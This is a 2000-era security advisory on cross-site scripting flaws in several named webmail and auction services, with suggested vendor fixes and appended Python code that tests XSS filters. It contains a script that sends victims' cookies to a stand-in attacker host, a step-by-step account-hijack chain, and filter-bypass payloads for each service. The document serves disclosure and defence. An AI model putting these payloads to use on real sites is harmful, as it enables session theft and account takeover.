COMMAND
javascript
SYSTEMS AFFECTED
Web Applications
PROBLEM
'D-Krypt' found the following. Results show that Microsoft Hotmail,
Excite, Altavista, E-Bay, Lycos, Netscape WebMail, E-Trade,
Infoseek/Go.com and their users are all currently vulnerable to
web based attack.
The following report is the result of a two hour security survey
of high profile webmail and auction services offered free over
the internet. This survey is in no way extensive or thorough. It
serves only as "proof of concept" that these types of services are
vulnerable to attack on a wide scale. All the following
vulnerabilities are currently active as of Aug. 25, 2000.
Please note that the following vulnerabilities are NOT new and
have been posted publicly for weeks if not months by numerous
people.
The following webmail vulnerabilities all stem from the same
problem. The attacker has the ability to pass unfiltered
malicious HTML/JavaScript into the target user's web environment.
This means that the attacker can write code and send it to the
user, where it is then executed on the client side. Whatever is
within reach of JavaScript is now also within reach of the
attacker, remotely. What sensitive things does JavaScript (and so
the attacker) have access to within the browser?
1) Browser Cookies
2) Document Location
3) Browser and System Settings
4) Client Host Network Information
The above are the most prominent pieces of sensitive information
the browser holds.
The following vulnerabilities focus only on #1 (Browser Cookies).
Most if not all webmail services use cookie data for
authentication. If the attacker compromises the cookie data of
the user, the account can now be accessed.
Simply, if the attacker can pilfer the cookie data, they can
substitute that cookie into their own browser and authenticate
without the knowledge of a username/password being necessary.
Thus the attacker has become the target user until the session
runs out. Variants may be required to achieve maximum results.
Remember, this is only proof of concept.
Also worth mentioning is that the attacker may use any browser
specific vulnerabilities that require JavaScript, such as browser
cache exploits, history exploits, and others.
How does the attacker bypass browser cookie security to move the
cookie data off the intended cookie domain to another? Good
question.
Let's say that the attacker is able to execute arbitrary
HTML/JavaScript on the target user's machine. We now know that
JavaScript has access to the cookie strings of the domain it is
executed on. Using JavaScript, the attacker can issue a "GET"
request, say through the use of an "IMG" tag or a webpage request,
appending the cookie string to the end of the request.
<SCRIPT>
document.sender.src = "http://www.attacker.com/evil.cgi/" +
document.cookie;
</SCRIPT>
<IMG NAME=sender SRC="some_image.gif">
which in essence becomes:
<IMG NAME=sender SRC="http://www.attacker.com/evil.cgi/users_cookie_data">
Making it even harder to detect, a 1 pixel by 1 pixel image would
also work. This can all happen quickly on the fly with javascript
in many varying ways.
The rest of the document relies on this principal flaw. If an
attacker can cause the user to view unrestricted arbitrary
HTML/JavaScript within their environment, the account is
vulnerable. This is the general premise.
To summarize, let's follow the chain of events.
1) Attacker sends a crafted HTML/JavaScript email to his
target.
2) User signs into whatever service and is assigned an
authentication cookie.
3) User reads the attacker's email.
4) User's cookie is secretly sent to the attacker's CGI via an
invisible GET request.
5) User continues on, never being the wiser.
6) Attacker checks his CGI logs and finds the cookie string.
7) Attacker places the victim's cookie in his/her own cookie
file.
8) Attacker logs onto the service with the user's account.
Simple.
The following companies were picked by no other criterion than
that they offer free webmail or auction services and have a large
user base.
Microsoft Hotmail http://www.hotmail.com/
Excite Mail http://inbox.excite.com/
Altavista Mail http://www.altavista.com/
E-Bay Chat Forums http://www.ebay.com/
Lycos http://comm.lycos.com/
Netscape WebMail http://home.netscape.com/webmail/index-f.html
E-Trade Mail http://www.etrade.com
Infoseek/Go.com http://register.go.com/
A service not mentioned in the list is not necessarily
invulnerable; it simply hasn't been looked at.
All the following vulnerabilities rely on sending HTML mail to the
target user. The following information is for example purposes
only and is not a complete account compromise (which is not
required to demonstrate the point). All that is shown is that the
embedded JavaScript code will use an alert dialog window to
display cookie data to the user. Anything you do to go further
with the exploitation is of your own accord.
******EXAMPLE******
MIME-Version: 1.0
From: hacker <reason@mindless.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: The Example
<HTML><BODY>
INSERT EXPLOIT HERE
</BODY></HTML>
.
*******************
=======================================================================
Microsoft Hotmail
Vulnerable to: "HTML Entity"
Exploit:
<!-- REMOVE THE OFFENDING SLASH -->
<IMG SRC="javas&\#09;cript:alert(document.cookie);">
=======================================================================
Excite Mail
Vulnerable to: "Multi-Line Break IMG SRC JavaScript Execute"
Exploit:
<IMG SRC="j
avascr
ipt:ale
rt(document.cookie);">
=======================================================================
Altavista
Vulnerable to: "HTML Entity"
Exploit:
<!-- REMOVE THE OFFENDING SLASH -->
<IMG SRC="javas&\#09;cript:alert(document.cookie);">
=======================================================================
E-Bay Chat Forums
Vulnerable to: "IMG SRC JavaScript Execute"
Exploit:
<IMG SRC="javascript:alert(document.cookie);">
=======================================================================
Lycos/MailCity
Vulnerable to: "STYLE TYPE JavaScript"
Exploit:
<style TYPE="text/javascript">
alert(document.cookie);
</style>
=======================================================================
Netscape WebMail (netscape.net)
Vulnerable to: "STYLE TYPE JavaScript"
Exploit:
<style TYPE="text/javascript">
alert(document.cookie);
</style>
=======================================================================
E-Trade FreeMail
Vulnerable to: "STYLE TYPE JavaScript"
Exploit:
<IMG SRC="livescript:alert(document.cookie);">
=======================================================================
Infoseek/Go Network Mail
Vulnerable to: "Multi-Line Break IMG SRC JavaScript Execute"
Exploit:
<IMG SRC="j
avascr
ipt:ale
rt(document.cookie);">
=======================================================================
SOLUTION
Vendor: Filter for known JavaScript strings and disallow them from
entering the user's environment.
User: Turn off JavaScript until a fix has been implemented by the
vendor.
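As an added example (not part of the original advisory, and not any vendor's code), the Python check below takes the vendor's side: it shows why a literal "known JavaScript string" filter misses the HTML-entity, line-break and livescript: variants listed above, and how decoding entities, stripping whitespace and then allowlisting the URL scheme catches all of them. The sample attribute values are constructed, modelled on the exploits in this advisory.

```python
import html
import re

# Constructed sample IMG SRC values, modelled on the advisory's variants.
SAMPLES = {
    "plain": "javascript:alert(document.cookie);",
    "entity_tab": "javas&#09;cript:alert(document.cookie);",
    "multiline": "j\navascr\nipt:ale\nrt(document.cookie);",
    "livescript": "livescript:alert(document.cookie);",
    "benign": "http://example.test/some_image.gif",
}

# Schemes known to execute code in the browsers of the period.
SCRIPT_SCHEMES = ("javascript", "livescript", "vbscript")
ALLOWED_SCHEMES = ("http", "https")

def naive_filter(value: str) -> bool:
    """The advisory's literal suggestion: block if 'javascript:' appears.
    Returns True when the value would be allowed through."""
    return "javascript:" not in value.lower()

def normalize_scheme(value: str) -> str:
    """Decode HTML entities (&#09; becomes a tab), then remove every
    whitespace/control character before the first ':' so that the
    scheme is compared in canonical lower-case form."""
    decoded = html.unescape(value)
    head, sep, tail = decoded.partition(":")
    head = re.sub(r"[\s\x00-\x1f]", "", head)
    return (head + sep + tail).lower()

def allow_src(value: str) -> bool:
    """Hardened check: after normalization, accept only relative URLs
    or an allowlisted scheme. The allowlist, not the blocklist, is what
    also stops schemes the filter author never heard of."""
    head, sep, _ = normalize_scheme(value).partition(":")
    if not sep:
        return True  # no scheme at all: a relative image path
    if head in SCRIPT_SCHEMES:
        return False
    return head in ALLOWED_SCHEMES

def allow_style_type(value: str) -> bool:
    """For the STYLE TYPE variant: only a CSS stylesheet type is kept."""
    cleaned = re.sub(r"\s", "", html.unescape(value)).lower()
    return cleaned == "text/css"

def evaluate(filter_fn):
    """Run one filter over every sample; True means 'allowed through'."""
    return {name: filter_fn(v) for name, v in SAMPLES.items()}
```

Running evaluate(naive_filter) shows the entity, multi-line and livescript samples slipping through, while evaluate(allow_src) rejects all four script variants and keeps only the benign image.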